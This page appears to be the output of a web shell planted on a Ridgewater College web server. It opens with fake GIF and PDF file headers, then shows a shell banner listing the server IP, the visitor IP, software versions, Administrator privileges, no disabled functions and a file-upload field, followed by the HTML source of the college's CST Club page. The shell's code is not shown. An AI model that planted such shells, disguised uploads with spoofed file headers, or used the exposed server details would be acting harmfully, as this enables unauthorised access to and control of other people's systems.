GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/CSTclub/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <!-- **************************HEAD************************** --> <head> <meta charset="utf-8"> <meta name="HandheldFriendly" content="true"> <meta name="viewport" content="width=device-width, initialscale=1"> <meta name="keywords" content="cst, computer, systems, technology, ridgewater"> <meta name="author" content="Grant Ojanen"> <title>Ridgewater CST Club</title> <link rel="stylesheet" href="./stylesheet.css"> <link rel="icon" type="image/ico" href="./favicon.ico"> </head> <body> <!-- **************************Header************************** --> <header role="banner"> <h1> <a href="./index.html">Ridgewater <span id="club-title"><abbr title="Computer Systems Technology">CST</abbr> Club</span></a> </h1> <nav role="navigation"> <ul> <li><a href="https://cst.ridgewater.edu/Helpdesk/">Helpdesk Login</a></li> <li><a href="./index.html">Helpdesk Info</a></li> <li><a href="./cst-club.html">Club Info</a></li> </ul> </nav> </header> <div id="master"> <!-- **************************MAIN************************** --> <main role="main"> <section id="main"> <header> <h2>Welcome</h2> </header> <div> <article> <h3>Article 1</h3> <p>Content inside this article.</p> </article> <article> <h3>Article 2</h3> <p>Content inside this article.</p> <h4>Unordered List</h4> <ul> <li>Item 1</li> <li>Item 2</li> <li>Item 3</li> </ul> </article> </div> </section> </main> </div> <!-- **************************FOOTER************************** --> <footer role="contentinfo"> <address>©2015 Ridgewater College <ul> <li><a href="./index.html#contact">Contact</a></li> <li><a href="./cst-club.html#about">About</a></li> <li><a href="http://ridgewater.edu/Pages/Privacy-Statement.aspx">Privacy</a></li> <li> Webpage designed by <a href="http://www.g-rantsgames.com/index.html" rel="author external noreferrer">Grant Ojanen</a></li> </ul> </address> </footer> </body> </html>